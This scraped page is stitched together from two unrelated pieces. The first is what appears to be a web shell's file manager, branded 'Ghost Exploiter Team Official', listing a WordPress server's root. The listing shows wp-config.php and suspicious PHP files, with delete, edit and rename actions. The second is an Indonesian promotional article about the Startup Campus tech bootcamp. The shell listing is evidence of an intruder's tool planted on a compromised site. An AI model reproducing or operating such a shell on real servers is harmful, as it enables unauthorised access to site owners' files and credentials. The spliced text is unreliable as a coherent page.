Ghost Exploiter Team Official

/opt/bitnami/wordpress/
Nama File / Folder Size Action
licenses -- NONE
tmp -- NONE
wp-admin -- NONE
wp-content -- NONE
wp-includes -- NONE
brinny.php 44.256KB Hapus Edit Rename
disable.htaccess 7.322KB Hapus Edit Rename
index.php 7.656KB Hapus Edit Rename
install.php 18.03KB Hapus Edit Rename
license.txt 19.448KB Hapus Edit Rename
readme.html 7.226KB Hapus Edit Rename
robots.txt 0.064KB Hapus Edit Rename
sombrely.php 44.256KB Hapus Edit Rename
uxo.txt 0.001KB Hapus Edit Rename
wp-activate.php 7.042KB Hapus Edit Rename
wp-blog-header.php 0.343KB Hapus Edit Rename
wp-comments-post.php 2.269KB Hapus Edit Rename
wp-config-sample.php 2.942KB Hapus Edit Rename
wp-config.php 4.407KB Hapus Edit Rename
wp-cron.php 5.506KB Hapus Edit Rename
wp-links-opml.php 2.443KB Hapus Edit Rename
wp-load.php 3.835KB Hapus Edit Rename
wp-login.php 49.733KB Hapus Edit Rename
wp-mail.php 8.325KB Hapus Edit Rename
wp-settings.php 25.79KB Hapus Edit Rename
wp-signup.php 33.579KB Hapus Edit Rename
wp-trackback.php 4.771KB Hapus Edit Rename
xmlrpc.php 3.08KB Hapus Edit Rename
Intip Bootcamp yang Bikin Kamu Jago Tech Skill dan Siap Kerja! - Startup Campus

Intip Bootcamp yang Bikin Kamu Jago Tech Skill dan Siap Kerja!

Contents

Intip Bootcamp yang Bikin Kamu Jago Tech Skill dan Siap Kerja!

STARTUPCAMPUS.ID– Seiring dengan berkembangnya tren digitalisasi dan startup, anak muda zaman sekarang berlomba mengasah diri untuk menjadi pendiri bisnis rintisan ataupun memiliki keahlian tersertifikasi di bidang teknologi. Dalam rangka mewadahi semangat tersebut, Achmad Zaky Foundation mendirikan Startup Campus guna mendukung lebih banyak anak Indonesia yang memajukan Indonesia dengan keahliannya di bidang teknologi dan bisnis. Inisiasi Startup Campus ini datang dari visi Achmad Zaky untuk mewujudkan lingkungan seperti Silicon Valley -pusat inovasi di Amerika Serikat yang mencetak banyak perusahaan teknologi besar- di Indonesia.

Sebagai salah satu program magang dan studi independen bersertifikat (MSIB) di bawah Kampus Merdeka, Startup Campus menyediakan pembelajaran daring bersama para ahli, pelatihan bersertifikat, mentoring, hingga kesempatan praktikal bagi para peserta. Tak hanya itu, dengan tujuan meningkatkan kompetensi peserta, program ini dilengkapi pula dengan berbagai manfaat seputar persiapan kerja sesuai track yang diikuti, lhoh!

Pembelajaran individu dan kelas sinkronus

Kegiatan selama program Startup Campus mencakup pembelajaran individu dan kelas sinkronus. Melalui pembelajaran individu, mahasiswa peserta program dapat secara mandiri mendalami video dan referensi belajar yang disediakan. Kelas sinkronus sendiri melibatkan peserta dalam sesi pendampingan bersama mentor setiap minggunya dengan metode seminar, role-play, diskusi, dan lain-lain.

Mentorship dan pembelajaran langsung dari ahli

Berbagai manfaat dapat diterima oleh peserta, seperti mentorship, pembelajaran langsung secara dari dari pembicara ahli, sertifikasi kompetensi, dan networking dengan tokoh penting di dunia startup dan teknologi.  Program Startup Campus diselenggarakan bersama 9 mitra yaitu Achmad Zaky Foundation, init 6, AWS, Assegaf Hamzah & Partners, Tech in Asia, Founder Institute, 500 Startups, BLOCK 71-National University of Singapore, dan Bain & Company.

Konversi 20 SKS

Sebagai bagian dari Kampus Merdeka, Startup Campus bekerja sama dengan Kementerian Pendidikan, Kebudayaan, Riset, dan Teknologi (Kemendikbudristek) dengan kelas pembelajaran yang dapat dikonversikan sebagai kredit 20 SKS. Hal ini dinyatakan sebagai salah satu bentuk dukungan dari Pemerintah dalam mengembangkan karya bangsa untuk mencetak startup entrepreneur hingga sociopreneur bertaraf internasional.

Belum lagi, terhitung mulai batch 3 di tahun 2022 ini, Startup Campus membuka 5 tracks yang memberikan semakin banyak varian benefit untuk lebih banyak peserta lhoh! Bagi kamu yang ingin bergabung di track The Founder, kamu bisa mendapatkan dukungan untuk membangun minimum viable product, demo day untuk pitching dengan investor secara langsung, hingga kesempatan mendapatkan pendanaan hingga jutaan rupiah. Sedangkan di track digital terbaru lainnya, yaitu Data Science, Back End Engineering, Artificial Intelligence, dan UI/UX Design, peserta bisa mendapatkan manfaat lainnya seperti membangun portfolio, recommendation letter untuk peserta terbaik, hingga job preparation yang dikemas dalam sebuah masterclass. Benar-benar bermanfaat untuk menciptakan startups yang berkompeten dan membekali diri dengan digital skills, ya!

Sebelum kita simak cerita langsung dari para peserta Startup Campus, yuk kita tengok keseruan onboarding offline awal tahun 2022 kemarin!

Para peserta dari batch yang sudah berjalan juga kerap membagikan cerita seru mereka di Startup Campus. Pengalaman mengikuti online bootcamp Startup Campus ini membantu mereka mendapatkan banyak ilmu berdaging tentang techno-preneur yang mudah dipahami dan tentunya semakin mengembangkan peserta. Curhat para peserta, aktivitas selama di Startup Campus sangat berkesan, seperti sesi live session bersama expert yang super keren, bertemu mentor yang friendly dan thoughtful banget, plus sesi curhat atau cycle meeting yang asik banget! Peserta lainnya juga menambahkan tentang pengalaman mempelajari soft skill dan hard skill yang lengkap dan dikemas dalam rangkaian program yang menyenangkan dan menantang, alias out of comfort zone dan must try! Dari cerita para peserta batch 1 dan 2 ini, mereka berharap semakin banyak anak Indonesia yang mengembangkan dirinya bersama Startup Campus. Wah setelah dengar cerita mereka, jadi takut nyesel kalau melewatkan kesempatan emas ini nih!

Gimana, kamu semakin tertarik untuk mencapai impianmu di digital industry bersama Startup Campus? Tenang, Startup Campus masih membuka pendaftaran batch 3 di program Kampus Merdeka yang bisa kamu ikuti secara gratis! Kalau kamu ingin bergabung pada track The Founder, persiapkan tim mu dan ide start-up yang ingin dikembangkan kedepannya, ya! Tertarik dengan track digital lainnya? Tunggu apa lagi, daftar dan persiapkan dirimu untuk proses berikutnya, karena kesempatan ini terbuka untuk semua jurusan! Pendaftaran bisa dilakukan melalui website startupcampus.id, ya! Tahapan seleksi berlangsung dengan kompetitif demi memastikan besarnya potensi peserta, jadi bersiap menjadi yang terbaik yuk!

Nah, untuk Startup Campus Batch 3 yang akan dimulai di akhir bulan Juli 2022 ini, apakah kamu sudah siap untuk bergabung? Kembangkan dirimu untuk bersiap #ToTheNextLevel bersama Startup Campus, yuk!

Ignatia Endra Kristianti
Halo saya Ignatia Kristianti atau biasa dipanggil Inne. Saya adalah penulis konten di website Startupcampus.id. Senang bisa berbagi!

Bagikan Artikel

Share on whatsapp
Share on telegram
Share on facebook
Share on twitter
Share on linkedin
Share on email
Subscribe
Notify of
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x